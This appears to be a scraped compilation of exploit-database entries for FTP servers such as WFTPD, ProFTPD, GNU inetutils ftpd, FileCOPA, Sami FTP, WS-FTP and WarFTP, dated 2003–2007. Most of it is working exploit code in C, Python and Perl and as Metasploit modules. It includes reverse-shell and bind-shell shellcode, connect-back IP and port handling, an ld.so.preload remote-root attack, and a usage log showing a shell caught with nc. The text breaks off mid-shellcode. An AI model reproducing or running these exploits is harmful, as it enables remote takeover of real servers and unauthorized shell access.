* coded by h07 <[email protected]>
* tested on XP SP2 polish, 2000 SP4 polish
* example..
C:\>wftpd_exp 0 0 192.168.0.2 h07 open 192.168.0.1 4444
WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
coded by h07 <[email protected]>
FTP response: 331 Give me your password, please
FTP response: 230 Logged in successfully
[+] sending buffer: ok
press enter to quit
C:\>nc -l -p 4444
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\wftpd323>
*/
#include <stdio.h>
#include <winsock2.h>
#define BUFF_SIZE 1024
#define PORT 21
//win32 reverse shellcode (metasploit.com)
char shellcode[] =
"\x31\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\xb6"
"\x10\x92\x98\x83\xeb\xfc\xe2\xf4\x4a\x7a\x79\xd5\x 5e\xe9\x6d\x67"
"\x49\x70\x19\xf4\x92\x34\x19\xdd\x8a\x9b\xee\x9d\x ce\x11\x7d\x13"
"\xf9\x08\x19\xc7\x96\x11\x79\xd1\x3d\x24\x19\x99\x 58\x21\x52\x01"
"\x1a\x94\x52\xec\xb1\xd1\x58\x95\xb7\xd2\x79\x6c\x 8d\x44\xb6\xb0"
"\xc3\xf5\x19\xc7\x92\x11\x79\xfe\x3d\x1c\xd9\x13\x e9\x0c\x93\x73"
"\xb5\x3c\x19\x11\xda\x34\x8e\xf9\x75\x21\x49\xfc\x 3d\x53\xa2\x13"
"\xf6\x1c\x19\xe8\xaa\xbd\x19\xd8\xbe\x4e\xfa\x16\x f8\x1e\x7e\xc8"
"\x49\xc6\xf4\xcb\xd0\x78\xa1\xaa\xde\x67\xe1\xaa\x e9\x44\x6d\x48"
"\xde\xdb\x7f\x64\x8d\x40\x6d\x4e\xe9\x99\x77\xfe\x 37\xfd\x9a\x9a"
"\xe3\x7a\x90\x67\x66\x78\x4b\x91\x43\xbd\xc5\x67\x 60\x43\xc1\xcb"
"\xe5\x53\xc1\xdb\xe5\xef\x42\xf0\xb6\x10\x92\x98\x d0\x78\x92\x98"
"\xd0\x43\x1b\x79\x23\x78\x7e\x61\x1c\x70\xc5\x67\x 60\x7a\x82\xc9"
"\xe3\xef\x42\xfe\xdc\x74\xf4\xf0\xd5\x7d\xf8\xc8\x ef\x39\x5e\x11"
"\x51\x7a\xd6\x11\x54\x21\x52\x6b\x1c\x85\x1b\x65\x 48\x52\xbf\x66"
"\xf4\x3c\x1f\xe2\x8e\xbb\x39\x33\xde\x62\x6c\x2b\x a0\xef\xe7\xb0"
"\x49\xc6\xc9\xcf\xe4\x41\xc3\xc9\xdc\x11\xc3\xc9\x e3\x41\x6d\x48"
"\xde\xbd\x4b\x9d\x78\x43\x6d\x4e\xdc\xef\x6d\xaf\x 49\xc0\xfa\x7f"
"\xcf\xd6\xeb\x67\xc3\x14\x6d\x4e\x49\x67\x6e\x67\x 66\x78\x62\x12"
"\xb2\x4f\xc1\x67\x60\xef\x42\x98";
void config_shellcode(unsigned long ip, unsigned short port)
{
memcpy(&shellcode[184], &ip, 4);
memcpy(&shellcode[190], &port, 2);
}
unsigned long target[] =
{
0x7d16887b, //JMP ESI (XP SP2 polish)
0x776f2015, //JMP ESI (2000 SP4 polish)
0x7cb9e082, //JMP ESI (XP SP2 english)
0x7848a5f1, //JMP ESI (2000 SP4 english)
0x7ca96834 //JMP ESI (XP SP2 german)
};
char buffer[BUFF_SIZE];
main(int argc, char *argv[])
{
int sock, id, opt, r_len;
unsigned long eip;
unsigned long connectback_IP;
unsigned short connectback_port;
struct hostent *he;
struct sockaddr_in client;
WSADATA wsa;
printf("\n WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit\n");
printf(" coded by h07 <[email protected]>\n");
if(argc < 8)
{
printf(" usage:..\n %s <ID> <opt> <host> <user> <pass> <connectback_IP> <connectback_port>\n\n", argv[0]);
printf(" ID list:\n");
printf("[>] 0: XP SP2 polish\n");
printf("[>] 1: 2000 SP4 polish\n");
printf("[>] 2: XP SP2 english\n");
printf("[>] 3: 2000 SP4 english\n");
printf("[>] 4: XP SP2 german\n\n");
printf(" opt - WFTPD option 'restrict to home directory and below'\n");
printf("[>] 0: disabled\n");
printf("[>] 1: enabled\n\n");
printf(" sample: %s 0 0 192.168.0.2 h07 open 192.168.0.1 4444\n\n", argv[0]);
exit(0);
}
WSAStartup(MAKEWORD(2, 0), &wsa);
id = atoi(argv[1]);
opt = atoi(argv[2]);
if((id > 4) || (id < 0))
{
printf("[-] ID error: unknown target\n");
exit(-1);
}
if((opt > 1) || (opt < 0))
{
printf("[-] opt error: unknown option\n");
exit(-1);
}
eip = target[id];
connectback_IP = inet_addr(argv[6]) ^ (ULONG)0x989210b6;
connectback_port = htons(atoi(argv[7])) ^ (USHORT)0x9892;
config_shellcode(connectback_IP, connectback_port);
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if((he = gethostbyname(argv[3])) == NULL)
{
printf("[-] Unable to resolve\n");
exit(-1);
}
client.sin_addr = *((struct in_addr *)he->h_addr);
client.sin_port = htons(PORT);
client.sin_family = AF_INET;
if(connect(sock, (struct sockaddr *) &client, sizeof(client)) == -1)
{
printf("[-] error: connect()\n");
exit(-1);
}
recv(sock, buffer, BUFF_SIZE -1, 0);
//USER
memset(buffer, 0, BUFF_SIZE);
sprintf(buffer, "USER %s\r\n", argv[4]);
send(sock, buffer, strlen(buffer), 0);
recv(sock, buffer, BUFF_SIZE -1, 0);
printf(" FTP response: %s", buffer);
//PASS
memset(buffer, 0, BUFF_SIZE);
sprintf(buffer, "PASS %s\r\n", argv[5]);
send(sock, buffer, strlen(buffer), 0);
recv(sock, buffer, BUFF_SIZE -1, 0);
printf(" FTP response: %s", buffer);
if(strstr(buffer, "530") != 0) exit(-1);
//SIZE
memset(buffer, 0x90, BUFF_SIZE);
memcpy(buffer, "SIZE ", 5);
switch(opt)
{
case 0:
{
memcpy(buffer + 5, "/", 1);
r_len = 531;
break;
}
case 1:
{
memcpy(buffer + 5, "//", 2);
r_len = 532;
break;
}
}
memcpy(buffer + 7, shellcode, sizeof(shellcode) -1);
*((unsigned long*)(&buffer[r_len])) = eip;
memcpy(buffer + (r_len + 4), "\r\n\x00", 3);
if(send(sock, buffer, strlen(buffer), 0) != -1)
printf("[+] sending buffer: ok\n");
else
printf("[-] sending buffer: failed\n");
printf(" press enter to quit\n");
getchar();
}
//EoF
// [2006-08-21]
21 Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit (PoC)
#!/usr/bin/python
#Easy File Sharing FTP Server 2.0 (PASS) 0day PoC exploit
#Proof of Concept: execute calc.exe
#Bug found by h07 <[email protected]>
#Tested on XP SP2 polish
#Date: 28.07.2006
#
#BUFF([PASS + 0x20]+[0x2c]+[NOP * 2571]+[0x41414141]+[\r\n])
#EIP = 0x41414141
host = "127.0.0.1"
port = 21
len_recv = 1024
user_name = "anonymous"
NOP_LEN = 2571
EIP = 0x77AB367B #popad pop ret (CRYPT32.DLL) XP SP2 polish
from socket import *
shellcode = ( #execute calc.exe ******sploit.com>
"\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\xd8"
"\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\x d8\x22\xf9\xa1"
"\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\x f8\x23\x99\x07"
"\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x 18\x56\x75\x25"
"\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x 53\x7d\x56\xe5"
"\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x 53\x23\x99\x6d"
"\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\x a0\x2d\xf9\xa4"
"\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\x d8\xa9\x32\xd0"
"\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x 8e\xc9\x7f\x8c"
"\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x 30\xcc\x8d\x1b"
"\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4")
def intel_order(i):
a = chr(i % 256)
i = i >> 8
b = chr(i % 256)
i = i >> 8
c = chr(i % 256)
i = i >> 8
d = chr(i % 256)
str = "%c%c%c%c" % (a, b, c, d)
return str
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(len_recv)
buffer = "USER %s\r\n" % (user_name)
s.send(buffer)
print s.recv(len_recv)
buffer = "PASS "
buffer += "\x2c"
buffer += "\x90" * (NOP_LEN - len(shellcode))
buffer += shellcode
buffer += intel_order(EIP)
buffer += "\r\n"
s.send(buffer)
print s.recv(len_recv)
s.close()
#EoF
# enigmagroup.org [2006-08-21]
21 ProFTPD 1.3.0 (sreplace) Remote Stack Overflow Exploit (meta)
# vd_proftpd.pm - Metasploit module for ProFTPD stack overflow
#
# Copyright (c) 2006 Evgeny Legerov
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
use strict;
package Msf::Exploit::vd_proftpd;
use base "Msf::Exploit";
use Pex::Text;
my $advanced = { };
my $info =
{
"Name" => "[0day] ProFTPD 1.3.0 stack overflow",
"Version" => "\$Revision: 1.1 \$",
"Authors" => ["Evgeny Legerov"],
"Arch" => ["x86"],
"OS" => ["linux"],
"Priv" => 1,
"UserOpts" =>
{
"RHOST" => [1, "ADDR", "The target address"],
"RPORT" => [1, "PORT", "The target port", 21],
"USER" => [1, "DATA", "Username", "ftp"],
"PASS" => [1, "DATA", "Password", "ftp123"],
"DIR" => [0, "DATA", "Writeable directory", ""],
},
"Description" => Pex::Text::Freeform(q{
This is a proof of concept exploit for src/support.c:sreplace stack overflow.
The off-by-one heap overflow bug in proftpd's sreplace function has been discovered about
2 (two) years ago by Evgeny Legerov. We tried to exploit this off-by-one bug via MKD command, but failed.
We did not work on this bug since then.
Actually, there are exists at least two bugs in sreplace function,
one is the mentioned off-by-one heap overflow bug the other is stack overflow
via 'sstrncpy(dst,src,negative argument)'.
We were unable to reach the sreplace stack overflow bug on ProFTPD 1.2.10 stable version,
but the version 1.3.0rc3 introduced some interesting changes, among them:
1. another (integer) overflow in sreplace!
2. now it is possible to reach sreplace stack overflow via pr_display_file!
3. stupid '.message' file display bug
So we decided to choose ProFTPD 1.3.0 as a target for our exploit.
To reach the bug, you need to upload a specially created .message file to a writeable directory,
then do "CWD <writeable directory>" to trigger the invocation of sreplace function.
Note that ProFTPD 1.3.0rc3 has introduced a stupid bug: to display '.message' file
you also have to upload a file named '250'. ProFTPD 1.3.0 fixes this bug.
The exploit is a part of VulnDisco Pack since Dec 2005.
}),
"Payload" =>
{
"Space" => 900,
"Keys" => ["+bind"],
"BadChars" => "\%\r\n\x00"
},
"DefaultTarget" => 0,
"Targets" =>
[
["ProFTPD 1.3.0 (source install) / Debian 3.1",
# objdump -D proftpd|grep call|grep edx
0x804afc8,
# nm proftpd|grep permanent_pool
0x80b59f8
]
],
"Keys" => ["vd_proftpd"],
};
sub new {
my $class = shift;
return $class->SUPER::new({"Info" => $info, "Advanced" => $advanced}, @_);
}
sub Exploit {
my $self = shift;
my $host = $self->GetVar("RHOST");
my $port = $self->GetVar("RPORT");
my $writedir = $self->GetVar("DIR");
my $bind_port = $self->GetVar("LPORT");
my $target = $self->Targets->[$self->GetVar("TARGET")];
my $encodedPayload = $self->GetVar("EncodedPayload");
my $shellcode = $encodedPayload->Payload;
my $sock = Msf::Socket::Tcp->new("PeerAddr" => $host, "PeerPort" => $port);
if ($sock->IsError) {
$self->PrintLine("Error creating socket: " . $sock->GetError);
return;
}
my $res = $sock->Recv(-1, 20);
if (!$res) {
$self->PrintLine("The service did not return a valid banner");
return;
}
$self->PrintLine("Banner: ". $self->CleanData($res));
$sock->Send("USER ". $self->GetVar('USER') ."\r\n");
$res = $sock->Recv(-1, 20);
$self->PrintLine("USER response: ". $self->CleanData($res));
if ($res !~ /^331/) {
$sock->Close;
return;
}
$sock->Send("PASS ". $self->GetVar('PASS') ."\r\n");
$res = $sock->Recv(-1, 20);
$self->PrintLine("PASS response: ". $self->CleanData($res));
if ($res !~ /^230/) {
$sock->Close;
return;
}
if (length($writedir) > 0) {
$sock->Send("CWD $writedir\r\n");
$res = $sock->Recv(-1, 20);
$self->PrintLine("CWD response: " . $self->CleanData($res));
}
my $current_dir = "";
$sock->Send("PWD\r\n");
$res = $sock->Recv(-1, 20);
$current_dir = $1 if ($res =~ /257\s\"(.+)\"/);
$current_dir .= "/" if (substr($current_dir, -1, 1) ne "/");
$self->PrintLine("Current directory: $current_dir");
my $dir1 = "A" x (251 - length($current_dir));
$self->PrintLine(sprintf "Dir1 length is %d bytes", length($dir1));
$sock->Send("MKD $dir1\r\n");
$res = $sock->Recv(-1, 20);
$self->PrintLine("MKD response: " . $self->CleanData($res));
$sock->Send("CWD $dir1\r\n");
$res = $sock->Recv(-1,20);
$self->PrintLine("CWD response: " . $self->CleanData($res));
$sock->Send("PWD\r\n");
$res = $sock->Recv(-1, 20);
$self->PrintLine("PWD response: " . $self->CleanData($res));
my $dir2 = "B" x 64;
$dir2 .= pack("V", $target->[1]);
$dir2 .= pack("V", $target->[2] - 4);
$dir2 .= "\xcc" x 28;
$self->PrintLine(sprintf "Dir2 length is %d bytes", length($dir2));
$sock->Send("DELE " . $dir2 . "/.message\r\n");
$sock->Recv(-1, 20);
$sock->Send("DELE " . $dir2 . "/250\r\n");
$sock->Recv(-1, 20);
$sock->Send("RMD $dir2\r\n");
$sock->Recv(-1, 20);
$sock->Send("MKD $dir2\r\n");
$res = $sock->Recv(-1, 20);
$self->PrintLine("MKD response: " . $self->CleanData($res));
# Upload .message file
$sock->Send("TYPE I\r\n");
$sock->Recv(-1, 20);
$sock->Send("PASV\r\n");
$res = $sock->Recv(-1, 20);
if ($res !~ /^227/) {
$self->PrintLine("Incorrect response to PASV command: " . $self->CleanData($res));
return;
}
$self->PrintLine("PASV response: " . $self->CleanData($res));
$res =~ /\((\d+)\,(\d+),(\d+),(\d+),(\d+),(\d+)/;
my $datahost = "$1.$2.$3.$4";
my $dataport = (int($5) << 8) + int($6);
$self->PrintLine("Opening connection to $datahost:$dataport");
my $datasock = Msf::Socket::Tcp->new("PeerAddr" => $datahost, "PeerPort" => $dataport);
if ($datasock->IsError) {
$self->PrintLine("Error creating socket: " . $datasock->GetError);
return;
}
$sock->Send("STOR $dir2/.message\r\n");
$res = $sock->Recv(-1, 20);
$self->PrintLine("STOR response: " . $self->CleanData($res));
my $filedata = "";
$filedata .= "A";
$filedata .= "\x66\x81\xc2\x5e\x13\x52\xc3"; # add $0x135e, %dx; push %edx; ret
$filedata .= "\%C" x 11;
$filedata .= "A";
$filedata .= $shellcode;
$filedata .= "A" x (900 - length($shellcode));
$filedata .= "\%CA" x 10;
$datasock->Send($filedata);
$datasock->Close();
$res = $sock->Recv(-1, 20);
$self->PrintLine("FILE transfered: " . $self->CleanData($res));
# Trigger sreplace overflow
$sock->Send("CWD $dir2\r\n");
$sock->Recv(-1,20);
sleep(3);
$sock->Close();
}
sub CleanData {
my $self = shift;
my $data = shift;
$data =~ s/\r|\n//g;
return $data;
}
__END__
# [2006-11-27]
21 GNU InetUtils ftpd 1.4.2 (ld.so.preload) Remote Root Exploit
# FTP server (GNU inetutils 1.4.2) Remote Root Exploit
# This program remotely exploits the most recent
# versions of GNU inetutils ftpd on linux systems.
#
# Requirements:
# 1. There MUST be a chroot'ed environment for the logged in user
# 2. Directory etc must be writeable by the logged in user (duh!)
#
# The exploit works as follows:
# 1. Create a shared library including a bindshell
# 2. Create a ld.so.preload file referencing the previously created shared library
# 3. Connect to the remote ftp server and log in using the ftp account
# 4. Upload the shared library and ld.so.preload into /etc
# 5. Run /bin/ls
#
# Result:
# uname -a;id;
# Linux XXXXX 2.6.11.9-vs2.0-rc1-node #1 SMP Fri May 13 11:52:23 CEST 2005 i686 GNU/Linux
# uid=0(root) gid=0(root) egid=70(ftp) groups=70(ftp)
#
# wu-ftpd has a setuid(ftp) before the execv to
# /bin/ls so there is no way escaping the chroot issued before.
#
# signed,
# kingcope Dec/2006
################################################## ############################################
use Net::FTP;
open FILE, ">program.c";
print FILE <<EOF;
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#define L_PORT "\\x0a\\x93" /* Port 2707 */
char ficken[] = "\\x6a\\x66\\x58\\x6a\\x01\\x5b\\x99\\x52\\x53\\x6a \\x02\\x89"
"\\xe1\\xcd\\x80\\x52\\x43\\x68\\xff\\x02"L_PORT"\\x89\\xe1"
"\\x6a\\x10\\x51\\x50\\x89\\xe1\\x89\\xc6\\xb0\\x66 \\xcd\\x80"
"\\x43\\x43\\xb0\\x66\\xcd\\x80\\x52\\x56\\x89\\xe1 \\x43\\xb0"
"\\x66\\xcd\\x80\\x89\\xd9\\x89\\xc3\\xb0\\x3f\\x49 \\xcd\\x80"
"\\x41\\xe2\\xf8\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68 \\x2f\\x2f"
"\\x62\\x69\\x89\\xe3\\x52\\x53\\x89\\xe1\\xb0\\x0b \\xcd\\x80";
void _init()
{
char *sh[2]={"/bin/sh",NULL};
int gg=0xed;
FILE *f;
setreuid(0,0);
setuid(0);
remove("/etc/ld.so.preload");
chdir("/");
chroot("etc");
while(gg!=0) {
chdir("..");gg--;
}
chroot("..");
void (*fc)();
(long) fc = &ficken;
fc();
}
EOF
close FILE;
open FILE,">ld.so.preload";
print FILE "/etc/libno_ex.so.1.0";
close FILE;
system("gcc -o program.o -c program.c -fPIC;gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles");
$ftp = Net::FTP->new($ARGV[0], Debug => 1) or die "Cannot connect to some.host.name: $@";
$ftp->login("ftp","ftp@") or die "Cannot login ", $ftp->message;
$ftp->binary;
$ftp->put("libno_ex.so.1.0", "/etc/libno_ex.so.1.0");
$ftp->put("ld.so.preload", "/etc/ld.so.preload");
print "\n\nNOTE: Running LS command, check the bindshell on port 2707.\n\n";
$ftp->dir();
$ftp->quit();
# [2006-12-15]
21 ProFTPD <= 1.2.9 rc2 (ASCII File) Remote Root Exploit
# ProFTPd remote root exploit
# solareclipse at phreedom dot org
# GPG key ID: E36B11B7
http://www.enigmagroup.org/sploits/12262006-proftpd-not-pro-enough.tar.gz
# [2003-10-15]
21 FileCOPA FTP Server <= 1.01 (LIST) Remote BoF Exploit (meta)
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::filecopa_list;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'FileCopa FTP Server pre 18 Jul Version',
'Version' => '$Revision: 0.1 $',
'Authors' =>
[
'Jacopo Cervini <acaro [at] jervus.it>'
],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp', 'win2003' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'thread' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 21],
'SSL' => [0, 'BOOL', 'Use SSL'],
'USER' => [1, 'DATA', 'Username', 'test'],
'PASS' => [1, 'DATA', 'Password', 'test'],
},
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00\x0a\x0d",
# 'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits the buffer overflow found in the LIST command
in fileCOPA FTP server pre 18 Jul 2006 version discovered by www.appsec.ch.
}),
'Refs' =>
[
['BID', '19065'],
],
'DefaultTarget' => 0,
'Targets' =>
[
['Windows 2000 SP4 English', 160, 0x7c2e7993 ], # jmp esp in ADVAPI32.dll
['Windows 2000 SP4 Italian', 160, 0x79277993 ], # jmp esp in ADVAPI32.dll
['Windows XP SP2 English', 240, 0x77df2740 ], # jmp esp in ADVAPI32.dll
],
'Keys' => ['filecopa'],
'DisclosureDate' => 'Jul 19 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
my $jmp = "\x66\x81\xc1\xa0\x01\x51\xc3";
#66:81C1 A001 ADD CX,1A0
#51 PUSH ECX
#C3 RETN
my $pattern = ("A" x $target->[1]);
$pattern .= pack('V', $target->[2]);
$pattern .= ("\x90"x4);
$pattern .= $jmp;
$pattern .= ("\x90"x283);
$pattern .= $shellcode;
my $request = "A " . $pattern ."\r\n";
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return;
}
my $r = $s->RecvLineMulti(20);
if (! $r) { $self->PrintLine(" No response from FTP server"); return; }
$self->Print($r);
$s->Send("USER " . $self->GetVar('USER') . "\r\n");
$r = $s->RecvLineMulti(20);
if (! $r) { $self->PrintLine(" No response from FTP server"); return; }
$self->Print($r);
$s->Send("PASS ".$self->GetVar('PASS')."\r\n");
$r = $s->RecvLineMulti(20);
if (! $r) { $self->PrintLine(" No response from FTP server"); return; }
$self->Print($r);
$self->PrintLine(sprintf (" Trying ".$target->[0]." using jmp esp at 0x%.8x...", $target->[2]));
$s->Send("LIST $request");
sleep(2);
return;
}
# [2007-01-09]
21 Sami FTP Server 2.0.2 (USER/PASS) Remote Buffer Overflow Exploit
#!/usr/bin/perl
# Exploit for SAMI FTP version 2.0.2
# USER/PASS BUFFER OVERFLOW ARBITARY REMOTE CODE EXECUTION (CALC.exe)
# You can put you own shellcode to spawn a shell
# Thrusday 17th Jan 2007
# Tested on : Windows 2000 SP4 (Use your own return address for other flavors)
#
#
#
# Coded by UmZ! [email protected]
# On behalf of : Secure Bytes Inc.
# http://www.secure-bytes.com/exploits/
#
#
#
# Special Thanks to Ahmad Tauqeer, Ali Shuja and Uquali
#
#
# Disclaimer: This Proof of concept exploit is for educational purpose only.
# Please do not use it against any system without prior permission.
# You are responsible for yourself for what you do with this code.
#
#
# Note: After executing the exploit You will get "Cannot login User or password not correct."
# That doesn't mean exploit failed whenever you click on Sami FTP server it will crash
# resulting in the execution of calc.exe and will execute whenever the SAMI FTP server
# restarts until it is reinstalled.
use Net::FTP;
print "Coded by UmZ! [email protected]\n";
print "http://www.secure-bytes.com/exploits/\n";
$ftp = Net::FTP->new("192.168.100.250", Debug => 0) or die "Cannot connect : $@";
my $msg ="\x90" x596; #140
my $msg2 ="B"x484;
my $shellcode = "\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\xd8".
"\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\x d8\x22\xf9\xa1".
"\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\x f8\x23\x99\x07".
"\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x 18\x56\x75\x25".
"\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x 53\x7d\x56\xe5".
"\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x 53\x23\x99\x6d".
"\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\x a0\x2d\xf9\xa4".
"\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\x d8\xa9\x32\xd0".
"\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x 8e\xc9\x7f\x8c".
"\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x 30\xcc\x8d\x1b".
"\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4";
my $test= "\x90" x 108;
my $msg1=$msg. "\x70\xFD\x8B\x01"."\x96\x64\xF8\x77". $test . $shellcode. "\r\n";
$ftp->login($msg1."\r\n\0","umz") or die "Cannot login ", $ftp->message;
$ftp->quit;
# [2007-01-17]
21 IPSwitch WS-FTP 5.05 (XMD5) Remote Buffer Overflow Exploit (meta)
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::wsftp_server_505_xmd5;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'WS-FTP Server 5.05 XMD5 Overflow',
'Version' => '$Revision: 1.0 $',
'Authors' =>
[ 'Jacopo Cervini <acaro [at] jervus.it>',
],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp', 'win2003' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'thread' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 21],
'SSL' => [0, 'BOOL', 'Use SSL'],
'USER' => [1, 'DATA', 'Username', 'ftp'],
'PASS' => [1, 'DATA', 'Password', 'ftp'],
},
'Payload' =>
{
'Space' => 329,
'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x 5c\x2e",
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits the buffer overflow found in the XMD command
in IPSWITCH WS_FTP Server 5.05.
}),
'Refs' =>
[
['BID', '20076'],
[ 'CVE', '2006-4847' ],
],
'DefaultTarget' => 0,
'Targets' =>
[
['WS-FTP Server 5.05 Universal', 0x1002e636 ], # push esp, ret in LIBEAY32.dll
],
'Keys' => ['wsftp'],
'DisclosureDate' => 'Sep 14 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
if (! $self->InitNops(128)) {
$self->PrintLine(" Failed to initialize the NOP module.");
return;
}
my $request = Pex::Text::PatternCreate(676);
$request .= pack("V", $target->[1]);
$request .= $shellcode;
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return;
}
my $r = $s->RecvLineMulti(20);
if (! $r) { $self->PrintLine(" No response from FTP server"); return; }
$self->Print($r);
$s->Send("USER ".$self->GetVar('USER')."\n");
$r = $s->RecvLineMulti(10);
if (! $r) { $self->PrintLine(" No response from FTP server"); return; }
$self->Print($r);
$s->Send("PASS ".$self->GetVar('PASS')."\n");
$r = $s->RecvLineMulti(10);
if (! $r) { $self->PrintLine(" No response from FTP server"); return; }
$self->Print($r);
$self->PrintLine(" Attemping to exploit target '".$target->[0]."'...");
$s->Send("XMD5 $request\n");
$r = $s->RecvLineMulti(10);
if (! $r) { $self->PrintLine(" No response from FTP server"); return; }
$self->Print($r);
sleep(2);
return;
}
# [2007-02-19]
21 WarFTP 1.65 (USER) Remote Buffer Overflow Exploit (win2k SP4)
#!/usr/bin/python
# Remote exploit for WarFTP 1.65. Tested on Windows 2000 server SP4 inside
# VMware. A trivially exploitable stack overflow is present in WarFTP which
# can be triggered by sending a long username (>480 bytes) along with the USER
# ftp command. Maybe other commands like PASS might also be affected. I did
# not check though. This exploit binds shell on TCP port 4444 and then
# connects to it
#
# Author shall not bear any responsibility for any screw ups
# Winny Thomas :-)
import os
import sys
import time
import socket
import struct
# alphanumeric portbind shellcode from metasploit
shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49"
shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36"
shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34"
